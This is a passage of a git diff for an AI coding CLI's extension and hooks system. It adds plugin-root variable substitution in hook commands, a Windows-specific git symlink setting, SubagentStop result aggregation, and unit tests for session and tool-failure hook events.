{ + try { + const hooksContent = fs.readFileSync(hooksJsonPath, 'utf-8'); + const parsedHooks = JSON.parse(hooksContent); + + // Check if the file has a top-level "hooks" property or if the entire file content is the hooks object + let hooksData; + if (parsedHooks.hooks && typeof parsedHooks.hooks === 'object') { + hooksData = parsedHooks.hooks as { + [K in HookEventName]?: HookDefinition[]; + }; + } else { + // Assume the entire file content is the hooks object + hooksData = parsedHooks as { + [K in HookEventName]?: HookDefinition[]; + }; + } + + // Process the hooks to substitute variables like ${CLAUDE_PLUGIN_ROOT} + extension.hooks = this.substituteHookVariables( + hooksData, + effectiveExtensionPath, + ); + } catch (error) { + debugLogger.warn( + `Failed to parse hooks file ${hooksJsonPath}: ${error instanceof Error ? error.message : String(error)}`, + ); + } + } + } + return extension; } catch (e) { debugLogger.warn( @@ -673,6 +721,16 @@ export class ExtensionManager { } } + /** + * Substitute variables in hook configurations, particularly ${CLAUDE_PLUGIN_ROOT} + */ + private substituteHookVariables( + hooks: { [K in HookEventName]?: HookDefinition[] } | undefined, + extensionPath: string, + ): { [K in HookEventName]?: HookDefinition[] } | undefined { + return substituteHookVariables(hooks, extensionPath); + } + loadInstallMetadata( extensionDir: string, ): ExtensionInstallMetadata | undefined { diff --git a/packages/core/src/extension/github.test.ts b/packages/core/src/extension/github.test.ts index 8c31b1284..c197c34fe 100644 --- a/packages/core/src/extension/github.test.ts +++ b/packages/core/src/extension/github.test.ts @@ -56,6 +56,7 @@ describe('git extension helpers', () => { }); it('should clone, fetch and checkout a repo', async () => { + mockPlatform.mockReturnValue('linux'); const installMetadata = { source: 'http://my-repo.com', ref: 'my-ref', @@ -79,6 +80,50 @@ describe('git extension helpers', () => { 
expect(mockGit.checkout).toHaveBeenCalledWith('FETCH_HEAD'); }); + it('should use core.symlinks=false on Windows to avoid permission errors', async () => { + mockPlatform.mockReturnValue('win32'); + const installMetadata = { + source: 'http://my-repo.com', + ref: 'my-ref', + type: 'git' as const, + }; + const destination = '/dest'; + mockGit.getRemotes.mockResolvedValue([ + { name: 'origin', refs: { fetch: 'http://my-repo.com' } }, + ]); + + await cloneFromGit(installMetadata, destination); + + expect(mockGit.clone).toHaveBeenCalledWith('http://my-repo.com', './', [ + '-c', + 'core.symlinks=false', + '--depth', + '1', + ]); + }); + + it('should use core.symlinks=true on non-Windows platforms', async () => { + mockPlatform.mockReturnValue('darwin'); + const installMetadata = { + source: 'http://my-repo.com', + ref: 'my-ref', + type: 'git' as const, + }; + const destination = '/dest'; + mockGit.getRemotes.mockResolvedValue([ + { name: 'origin', refs: { fetch: 'http://my-repo.com' } }, + ]); + + await cloneFromGit(installMetadata, destination); + + expect(mockGit.clone).toHaveBeenCalledWith('http://my-repo.com', './', [ + '-c', + 'core.symlinks=true', + '--depth', + '1', + ]); + }); + it('should use HEAD if ref is not provided', async () => { const installMetadata = { source: 'http://my-repo.com', diff --git a/packages/core/src/extension/github.ts b/packages/core/src/extension/github.ts index 4fe830e45..e0f448b90 100644 --- a/packages/core/src/extension/github.ts +++ b/packages/core/src/extension/github.ts @@ -75,9 +75,12 @@ export async function cloneFromGit( // We let git handle the source as is. } } + // On Windows, symlinks require elevated privileges by default, so we + // disable them to avoid "Permission denied" errors during checkout. + const symlinkValue = os.platform() === 'win32' ? 
'false' : 'true'; await git.clone(sourceUrl, './', [ '-c', - 'core.symlinks=true', + `core.symlinks=${symlinkValue}`, '--depth', '1', ]); diff --git a/packages/core/src/extension/variables.test.ts b/packages/core/src/extension/variables.test.ts index d2015f4f9..e8a1db714 100644 --- a/packages/core/src/extension/variables.test.ts +++ b/packages/core/src/extension/variables.test.ts @@ -5,7 +5,8 @@ */ import { expect, describe, it } from 'vitest'; -import { hydrateString } from './variables.js'; +import { hydrateString, substituteHookVariables } from './variables.js'; +import { HookType } from '../hooks/types.js'; describe('hydrateString', () => { it('should replace a single variable', () => { @@ -16,3 +17,180 @@ describe('hydrateString', () => { expect(result).toBe('Hello, path/my-extension!'); }); }); + +describe('substituteHookVariables', () => { + it('should substitute ${CLAUDE_PLUGIN_ROOT} with the actual path in hooks', () => { + const basePath = '/path/to/plugin'; + + const hooks = { + PreToolUse: [ + { + description: 'Setup before start', + hooks: [ + { + type: HookType.Command, + command: '${CLAUDE_PLUGIN_ROOT}/scripts/setup.sh', + }, + ], + }, + ], + }; + + const result = substituteHookVariables(hooks, basePath); + + expect(result).toBeDefined(); + expect(result!['PreToolUse']).toHaveLength(1); + expect(result!['PreToolUse']![0].hooks![0].command).toBe( + '/path/to/plugin/scripts/setup.sh', + ); + }); + + it('should handle multiple hooks with variables', () => { + const basePath = '/project/plugins/my-plugin'; + + const hooks = { + PostToolUse: [ + { + description: 'Post install hook 1', + hooks: [ + { + type: HookType.Command, + command: '${CLAUDE_PLUGIN_ROOT}/bin/init.sh', + }, + ], + }, + { + description: 'Post install hook 2', + hooks: [ + { + type: HookType.Command, + command: 'chmod +x ${CLAUDE_PLUGIN_ROOT}/bin/executable.sh', + }, + ], + }, + ], + }; + + const result = substituteHookVariables(hooks, basePath); + + expect(result).toBeDefined(); + 
expect(result!['PostToolUse']).toHaveLength(2); + expect(result!['PostToolUse']![0].hooks![0].command).toBe( + '/project/plugins/my-plugin/bin/init.sh', + ); + expect(result!['PostToolUse']![1].hooks![0].command).toBe( + 'chmod +x /project/plugins/my-plugin/bin/executable.sh', + ); + }); + + it('should handle multiple event types with hooks', () => { + const basePath = '/home/user/.qwen/extensions/my-extension'; + + const hooks = { + PreToolUse: [ + { + matcher: 'test-matcher', // Part of HookDefinition + sequential: true, // Part of HookDefinition + hooks: [ + // HookConfig[] array inside HookDefinition + { + type: HookType.Command, // HookType.Command + command: '${CLAUDE_PLUGIN_ROOT}/scripts/pre-start.sh', + }, + ], + }, + ], + UserPromptSubmit: [ + { + matcher: 'another-matcher', // Part of HookDefinition + sequential: false, // Part of HookDefinition + hooks: [ + // HookConfig[] array inside HookDefinition + { + type: HookType.Command, // HookType.Command + command: '${CLAUDE_PLUGIN_ROOT}/setup/install.py', + }, + ], + }, + ], + }; + + const result = substituteHookVariables(hooks, basePath); + + expect(result).toBeDefined(); + expect(result!['PreToolUse']).toHaveLength(1); + expect(result!['PreToolUse']![0].hooks![0].command).toBe( + '/home/user/.qwen/extensions/my-extension/scripts/pre-start.sh', + ); + expect(result!['UserPromptSubmit']).toHaveLength(1); + expect(result!['UserPromptSubmit']![0].hooks![0].command).toBe( + '/home/user/.qwen/extensions/my-extension/setup/install.py', + ); + }); + + it('should not modify non-command hooks', () => { + const basePath = '/path/to/extension'; + + const hooks = { + SessionStart: [ + { + matcher: 'test-matcher', // This is part of HookDefinition + sequential: true, // This is part of HookDefinition + hooks: [ + // This is the HookConfig[] array inside HookDefinition + { + type: HookType.Command, // This is part of HookConfig + command: '${CLAUDE_PLUGIN_ROOT}/scripts/run.sh', // This is part of HookConfig + }, + { + 
type: 'non-command' as HookType.Command, // Non-command type won't be processed + command: '${CLAUDE_PLUGIN_ROOT}/not-affected', // Should not be modified + }, + ], + }, + ], + }; + + const result = substituteHookVariables(hooks, basePath); + + expect(result).toBeDefined(); + expect(result!['SessionStart']).toHaveLength(1); + expect(result!['SessionStart']![0].hooks![0].command).toBe( + '/path/to/extension/scripts/run.sh', + ); + expect(result!['SessionStart']![0].hooks![1].command).toBe( + '${CLAUDE_PLUGIN_ROOT}/not-affected', + ); // Non-command type won't be processed + }); + + it('should return undefined when hooks is undefined', () => { + const result = substituteHookVariables(undefined, '/some/path'); + expect(result).toBeUndefined(); + }); + + it('should return original hooks when no ${CLAUDE_PLUGIN_ROOT} found', () => { + const basePath = '/path/to/plugin'; + + const hooks = { + Stop: [ + { + matcher: 'test-matcher', // This is part of HookDefinition + sequential: true, // This is part of HookDefinition + hooks: [ + // This is the HookConfig[] array inside HookDefinition + { + type: HookType.Command, // This is part of CommandHookConfig + command: 'echo "hello world"', // This is part of CommandHookConfig + }, + ], + }, + ], + }; + + const result = substituteHookVariables(hooks, basePath); + + expect(result).toBeDefined(); + expect(result).toEqual(hooks); // Should be equal but not the same object (deep clone) + expect(result!['Stop']![0].hooks![0].command).toBe('echo "hello world"'); + }); +}); diff --git a/packages/core/src/extension/variables.ts b/packages/core/src/extension/variables.ts index ccac1c65f..7bdc60d13 100644 --- a/packages/core/src/extension/variables.ts +++ b/packages/core/src/extension/variables.ts @@ -7,6 +7,10 @@ import { type VariableSchema, VARIABLE_SCHEMA } from './variableSchema.js'; import path from 'node:path'; import { QWEN_DIR } from '../config/storage.js'; +import type { HookEventName, HookDefinition } from '../hooks/types.js'; 
+ +// Re-export types for substituteHookVariables +export type { HookEventName, HookDefinition }; export const EXTENSIONS_DIRECTORY_NAME = path.join(QWEN_DIR, 'extensions'); export const EXTENSIONS_CONFIG_FILENAME = 'qwen-extension.json'; @@ -70,3 +74,40 @@ export function recursivelyHydrateStrings( } return obj; } + +/** + * Substitute variables in hook configurations, particularly ${CLAUDE_PLUGIN_ROOT} + * @param hooks - The hooks configuration object + * @param basePath - The path to substitute for ${CLAUDE_PLUGIN_ROOT} + * @returns A deep cloned hooks object with variables substituted + */ +export function substituteHookVariables( + hooks: { [K in HookEventName]?: HookDefinition[] } | undefined, + basePath: string, +): { [K in HookEventName]?: HookDefinition[] } | undefined { + if (!hooks) return hooks; + + // Deep clone the hooks to avoid modifying the original + const clonedHooks = JSON.parse(JSON.stringify(hooks)); + + // Replace ${CLAUDE_PLUGIN_ROOT} with the actual extension path in all command hooks + for (const eventName in clonedHooks) { + const eventHooks = clonedHooks[eventName as HookEventName]; + if (eventHooks && Array.isArray(eventHooks)) { + for (const hookDef of eventHooks) { + if (hookDef.hooks && Array.isArray(hookDef.hooks)) { + for (const hook of hookDef.hooks) { + if (hook.type === 'command' && hook.command) { + hook.command = hook.command.replace( + /\$\{CLAUDE_PLUGIN_ROOT\}/g, + basePath, + ); + } + } + } + } + } + } + + return clonedHooks; +} diff --git a/packages/core/src/hooks/hookAggregator.test.ts b/packages/core/src/hooks/hookAggregator.test.ts index 129713b66..5667d5654 100644 --- a/packages/core/src/hooks/hookAggregator.test.ts +++ b/packages/core/src/hooks/hookAggregator.test.ts @@ -174,12 +174,21 @@ describe('HookAggregator', () => { it('should preserve other hookSpecificOutput fields', () => { const outputs: HookOutput[] = [ { + decision: 'allow', + reason: 'Test reason 1', hookSpecificOutput: { + hookEventName: 'PostToolUse', 
additionalContext: 'ctx', - tailToolCallRequest: { name: 'A' }, }, }, - { hookSpecificOutput: { additionalContext: 'ctx2' } }, + { + decision: 'allow', + reason: 'Test reason 2', + hookSpecificOutput: { + hookEventName: 'PostToolUse', + additionalContext: 'ctx2', + }, + }, ]; const results: HookExecutionResult[] = outputs.map((output) => ({ @@ -194,9 +203,6 @@ describe('HookAggregator', () => { results, HookEventName.PostToolUse, ); - expect( - result.finalOutput?.hookSpecificOutput?.['tailToolCallRequest'], - ).toEqual({ name: 'A' }); expect( result.finalOutput?.hookSpecificOutput?.['additionalContext'], ).toBe('ctx\nctx2'); @@ -615,4 +621,177 @@ describe('HookAggregator', () => { expect(result.finalOutput?.decision).toBe('allow'); }); }); + + describe('SubagentStop - mergeWithOrLogic', () => { + it('should use mergeWithOrLogic for SubagentStop event', () => { + const outputs: HookOutput[] = [ + { reason: 'first reason', decision: 'allow' }, + { reason: 'second reason', decision: 'allow' }, + ]; + + const results: HookExecutionResult[] = outputs.map((output) => ({ + hookConfig: { type: HookType.Command, command: 'echo test' }, + eventName: HookEventName.SubagentStop, + success: true, + output, + duration: 100, + })); + + const result = aggregator.aggregateResults( + results, + HookEventName.SubagentStop, + ); + expect(result.finalOutput?.reason).toBe('first reason\nsecond reason'); + }); + + it('should block when any SubagentStop hook blocks', () => { + const outputs: HookOutput[] = [ + { reason: 'output looks good', decision: 'allow' }, + { reason: 'output too short', decision: 'block' }, + ]; + + const results: HookExecutionResult[] = outputs.map((output) => ({ + hookConfig: { type: HookType.Command, command: 'echo test' }, + eventName: HookEventName.SubagentStop, + success: true, + output, + duration: 100, + })); + + const result = aggregator.aggregateResults( + results, + HookEventName.SubagentStop, + ); + expect(result.finalOutput?.decision).toBe('block'); + 
}); + + it('should concatenate additionalContext for SubagentStop', () => { + const outputs: HookOutput[] = [ + { hookSpecificOutput: { additionalContext: 'context from hook 1' } }, + { hookSpecificOutput: { additionalContext: 'context from hook 2' } }, + ]; + + const results: HookExecutionResult[] = outputs.map((output) => ({ + hookConfig: { type: HookType.Command, command: 'echo test' }, + eventName: HookEventName.SubagentStop, + success: true, + output, + duration: 100, + })); + + const result = aggregator.aggregateResults( + results, + HookEventName.SubagentStop, + ); + expect( + result.finalOutput?.hookSpecificOutput?.['additionalContext'], + ).toBe('context from hook 1\ncontext from hook 2'); + }); + + it('should handle continue=false for SubagentStop', () => { + const outputs: HookOutput[] = [ + { continue: true }, + { continue: false, stopReason: 'subagent should stop' }, + ]; + + const results: HookExecutionResult[] = outputs.map((output) => ({ + hookConfig: { type: HookType.Command, command: 'echo test' }, + eventName: HookEventName.SubagentStop, + success: true, + output, + duration: 100, + })); + + const result = aggregator.aggregateResults( + results, + HookEventName.SubagentStop, + ); + expect(result.finalOutput?.continue).toBe(false); + expect(result.finalOutput?.stopReason).toBe('subagent should stop'); + }); + }); + + describe('createSpecificHookOutput - SubagentStop', () => { + it('should create StopHookOutput for SubagentStop', () => { + const output: HookOutput = { + decision: 'block', + reason: 'Output too short', + }; + const results: HookExecutionResult[] = [ + { + hookConfig: { type: HookType.Command, command: 'echo test' }, + eventName: HookEventName.SubagentStop, + success: true, + output, + duration: 100, + }, + ]; + + const result = aggregator.aggregateResults( + results, + HookEventName.SubagentStop, + ); + expect(result.finalOutput).toBeDefined(); + expect(result.finalOutput?.decision).toBe('block'); + 
expect(result.finalOutput?.reason).toBe('Output too short'); + }); + + it('should create StopHookOutput with isBlockingDecision for SubagentStop', () => { + const output: HookOutput = { + decision: 'block', + reason: 'Continue working on the task', + }; + const results: HookExecutionResult[] = [ + { + hookConfig: { type: HookType.Command, command: 'echo test' }, + eventName: HookEventName.SubagentStop, + success: true, + output, + duration: 100, + }, + ]; + + const result = aggregator.aggregateResults( + results, + HookEventName.SubagentStop, + ); + + // Verify the output can be consumed by StopHookOutput accessors + const hookOutput = createHookOutput( + HookEventName.SubagentStop, + result.finalOutput ?? {}, + ); + expect(hookOutput.isBlockingDecision()).toBe(true); + expect(hookOutput.getEffectiveReason()).toBe( + 'Continue working on the task', + ); + }); + + it('should create StopHookOutput with allow decision for SubagentStop', () => { + const output: HookOutput = { + decision: 'allow', + reason: 'Output looks complete', + }; + const results: HookExecutionResult[] = [ + { + hookConfig: { type: HookType.Command, command: 'echo test' }, + eventName: HookEventName.SubagentStop, + success: true, + output, + duration: 100, + }, + ]; + + const result = aggregator.aggregateResults( + results, + HookEventName.SubagentStop, + ); + + const hookOutput = createHookOutput( + HookEventName.SubagentStop, + result.finalOutput ?? 
{}, + ); + expect(hookOutput.isBlockingDecision()).toBe(false); + }); + }); }); diff --git a/packages/core/src/hooks/hookAggregator.ts b/packages/core/src/hooks/hookAggregator.ts index ea7cf2090..32da197cb 100644 --- a/packages/core/src/hooks/hookAggregator.ts +++ b/packages/core/src/hooks/hookAggregator.ts @@ -8,6 +8,8 @@ import { HookEventName, DefaultHookOutput, PreToolUseHookOutput, + PostToolUseHookOutput, + PostToolUseFailureHookOutput, StopHookOutput, PermissionRequestHookOutput, } from './types.js'; @@ -89,7 +91,8 @@ export class HookAggregator { case HookEventName.PostToolUseFailure: case HookEventName.Stop: case HookEventName.UserPromptSubmit: - merged = this.mergeWithOrLogic(outputs); + case HookEventName.SubagentStop: + merged = this.mergeWithOrLogic(outputs, eventName); break; case HookEventName.PermissionRequest: merged = this.mergePermissionRequestOutputs(outputs); @@ -109,8 +112,12 @@ export class HookAggregator { * - Reasons are concatenated with newlines * - continue=false takes precedence over continue=true * - Additional context is concatenated + * - For PostToolUse, decision and reason are required fields */ - private mergeWithOrLogic(outputs: HookOutput[]): HookOutput { + private mergeWithOrLogic( + outputs: HookOutput[], + _eventName?: HookEventName, + ): HookOutput { const merged: HookOutput = {}; const reasons: string[] = []; const additionalContexts: string[] = []; @@ -337,7 +344,12 @@ export class HookAggregator { switch (eventName) { case HookEventName.PreToolUse: return new PreToolUseHookOutput(output); + case HookEventName.PostToolUse: + return new PostToolUseHookOutput(output); + case HookEventName.PostToolUseFailure: + return new PostToolUseFailureHookOutput(output); case HookEventName.Stop: + case HookEventName.SubagentStop: return new StopHookOutput(output); case HookEventName.PermissionRequest: return new PermissionRequestHookOutput(output); diff --git a/packages/core/src/hooks/hookEventHandler.test.ts 
b/packages/core/src/hooks/hookEventHandler.test.ts index f556a8c30..9bffed8bb 100644 --- a/packages/core/src/hooks/hookEventHandler.test.ts +++ b/packages/core/src/hooks/hookEventHandler.test.ts @@ -6,7 +6,17 @@ import { describe, it, expect, vi, beforeEach, type Mock } from 'vitest'; import { HookEventHandler } from './hookEventHandler.js'; -import { HookEventName, HookType, HooksConfigSource } from './types.js'; +import { + HookEventName, + HookType, + HooksConfigSource, + SessionStartSource, + SessionEndReason, + PermissionMode, + AgentType, + PreCompactTrigger, + NotificationType, +} from './types.js'; import type { Config } from '../config/config.js'; import type { HookPlanner, @@ -14,7 +24,7 @@ import type { HookAggregator, AggregatedHookResult, } from './index.js'; -import type { HookConfig, HookOutput } from './types.js'; +import type { HookConfig, HookOutput, PermissionSuggestion } from './types.js'; describe('HookEventHandler', () => { let mockConfig: Config; @@ -192,6 +202,204 @@ describe('HookEventHandler', () => { }); }); + describe('fireSessionStartEvent', () => { + it('should execute hooks for SessionStart event', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.fireSessionStartEvent( + SessionStartSource.Startup, + 'test-model', + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.SessionStart, + { trigger: SessionStartSource.Startup }, + ); + expect(result.success).toBe(true); + }); + + it('should include all session start parameters in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', 
+ source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireSessionStartEvent( + SessionStartSource.Resume, + 'test-model', + PermissionMode.Plan, + AgentType.Bash, + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + permission_mode: PermissionMode; + source: SessionStartSource; + model: string; + agent_type?: AgentType; + }; + expect(input.permission_mode).toBe(PermissionMode.Plan); + expect(input.source).toBe(SessionStartSource.Resume); + expect(input.model).toBe('test-model'); + expect(input.agent_type).toBe(AgentType.Bash); + }); + + it('should use default permission mode when not provided', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireSessionStartEvent( + SessionStartSource.Clear, + 'test-model', + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + permission_mode: PermissionMode; + }; + expect(input.permission_mode).toBe(PermissionMode.Default); + }); + + it('should handle session start event with undefined agent type', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + 
vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.fireSessionStartEvent( + SessionStartSource.Compact, + 'test-model', + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + permission_mode: PermissionMode; + source: SessionStartSource; + model: string; + agent_type?: AgentType; + }; + expect(input.source).toBe(SessionStartSource.Compact); + expect(input.model).toBe('test-model'); + expect(input.agent_type).toBeUndefined(); + }); + }); + + describe('fireSessionEndEvent', () => { + it('should execute hooks for SessionEnd event', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.fireSessionEndEvent( + SessionEndReason.Clear, + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.SessionEnd, + { trigger: SessionEndReason.Clear }, + ); + expect(result.success).toBe(true); + }); + + it('should include reason in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await 
hookEventHandler.fireSessionEndEvent(SessionEndReason.Logout); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { reason: SessionEndReason }; + expect(input.reason).toBe(SessionEndReason.Logout); + }); + + it('should handle different session end reasons', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + // Test all possible session end reasons + const testReasons = [ + SessionEndReason.Clear, + SessionEndReason.Logout, + SessionEndReason.PromptInputExit, + SessionEndReason.Bypass_permissions_disabled, + SessionEndReason.Other, + ]; + + for (const reason of testReasons) { + await hookEventHandler.fireSessionEndEvent(reason); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[mockCalls.length - 1][2] as { + reason: SessionEndReason; + }; + expect(input.reason).toBe(reason); + } + }); + }); + describe('sequential vs parallel execution', () => { it('should execute hooks sequentially when plan.sequential is true', async () => { const mockPlan = createMockExecutionPlan( @@ -274,5 +482,1767 @@ describe('HookEventHandler', () => { expect(result.errors).toHaveLength(1); expect(result.errors[0].message).toBe('Runner error'); }); + + it('should handle errors for SessionStart event', async () => { + vi.mocked(mockHookPlanner.createExecutionPlan).mockImplementation(() => { + throw new Error('SessionStart planner error'); + }); + + const result = await hookEventHandler.fireSessionStartEvent( + SessionStartSource.Startup, + 'test-model', + ); + + expect(result.success).toBe(false); + 
expect(result.errors).toHaveLength(1); + expect(result.errors[0].message).toBe('SessionStart planner error'); + }); + + it('should handle errors for SessionEnd event', async () => { + vi.mocked(mockHookPlanner.createExecutionPlan).mockImplementation(() => { + throw new Error('SessionEnd planner error'); + }); + + const result = await hookEventHandler.fireSessionEndEvent( + SessionEndReason.Clear, + ); + + expect(result.success).toBe(false); + expect(result.errors).toHaveLength(1); + expect(result.errors[0].message).toBe('SessionEnd planner error'); + }); + }); + + describe('firePostToolUseFailureEvent', () => { + it('should execute hooks for PostToolUseFailure event', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePostToolUseFailureEvent( + 'toolu_test123', + 'test-tool', + { param: 'value' }, + 'An error occurred', + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PostToolUseFailure, + { toolName: 'test-tool' }, + ); + expect(result.success).toBe(true); + }); + + it('should include all parameters in the hook input', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePostToolUseFailureEvent( + 'toolu_test456', + 'shell', + { command: 'ls' }, + 'Command failed', + true, + 
PermissionMode.Yolo, + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + permission_mode: PermissionMode; + tool_use_id: string; + tool_name: string; + tool_input: Record; + error: string; + is_interrupt: boolean; + }; + + expect(input.permission_mode).toBe(PermissionMode.Yolo); + expect(input.tool_use_id).toBe('toolu_test456'); + expect(input.tool_name).toBe('shell'); + expect(input.tool_input).toEqual({ command: 'ls' }); + expect(input.error).toBe('Command failed'); + expect(input.is_interrupt).toBe(true); + }); + + it('should handle default values for optional parameters', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePostToolUseFailureEvent( + 'toolu_test789', + 'test-tool', + { param: 'value' }, + 'An error occurred', + ); + + const mockCalls = (mockHookRunner.executeHooksParallel as Mock).mock + .calls; + const input = mockCalls[0][2] as { + permission_mode: PermissionMode; + is_interrupt?: boolean; + }; + + expect(input.permission_mode).toBe(PermissionMode.Default); // Should default to Default + expect(input.is_interrupt).toBeUndefined(); // Should be undefined when not provided + }); + + it('should pass tool name as context for matcher filtering', async () => { + const mockPlan = createMockExecutionPlan([]); + const mockAggregated = createMockAggregatedResult(true); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + 
mockAggregated, + ); + + await hookEventHandler.firePostToolUseFailureEvent( + 'toolu_test123', + 'special-tool', + { param: 'value' }, + 'Error occurred', + ); + + expect(mockHookPlanner.createExecutionPlan).toHaveBeenCalledWith( + HookEventName.PostToolUseFailure, + { toolName: 'special-tool' }, // Context with tool name + ); + }); + + it('should handle successful execution with final output', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ]); + const mockAggregated = createMockAggregatedResult(true, { + reason: 'Processing error', + hookSpecificOutput: { + additionalContext: 'Additional failure context', + }, + }); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + mockAggregated, + ); + + const result = await hookEventHandler.firePostToolUseFailureEvent( + 'toolu_test999', + 'test-tool', + { param: 'value' }, + 'Error occurred', + ); + + expect(result.success).toBe(true); + expect(result.finalOutput).toBeDefined(); + expect(result.finalOutput?.reason).toBe('Processing error'); + }); + + it('should handle multiple hooks execution', async () => { + const mockPlan = createMockExecutionPlan([ + { + type: HookType.Command, + command: 'echo hook1', + source: HooksConfigSource.Project, + }, + { + type: HookType.Command, + command: 'echo hook2', + source: HooksConfigSource.Project, + }, + ]); + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksParallel).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePostToolUseFailureEvent( + 'toolu_test111', + 'multi-tool', + { params: ['a', 'b'] }, + 'Multiple errors', + ); + + 
expect(mockHookRunner.executeHooksParallel).toHaveBeenCalledTimes(1); + expect(mockHookRunner.executeHooksParallel).toHaveBeenCalledWith( + [ + { + type: HookType.Command, + command: 'echo hook1', + source: HooksConfigSource.Project, + }, + { + type: HookType.Command, + command: 'echo hook2', + source: HooksConfigSource.Project, + }, + ], + HookEventName.PostToolUseFailure, + expect.any(Object), // input object + expect.any(Function), // onHookStart callback + expect.any(Function), // onHookEnd callback + ); + }); + + it('should execute hooks sequentially when plan.sequential is true', async () => { + const mockPlan = createMockExecutionPlan( + [ + { + type: HookType.Command, + command: 'echo test', + source: HooksConfigSource.Project, + }, + ], + true, + ); + + vi.mocked(mockHookPlanner.createExecutionPlan).mockReturnValue(mockPlan); + vi.mocked(mockHookRunner.executeHooksSequential).mockResolvedValue([]); + vi.mocked(mockHookAggregator.aggregateResults).mockReturnValue( + createMockAggregatedResult(true), + ); + + await hookEventHandler.firePostToolUseFailureEvent( + 'toolu_sequential', + 'seq-tool', + { param: 'value' }, + 'Sequential error', + ); + + 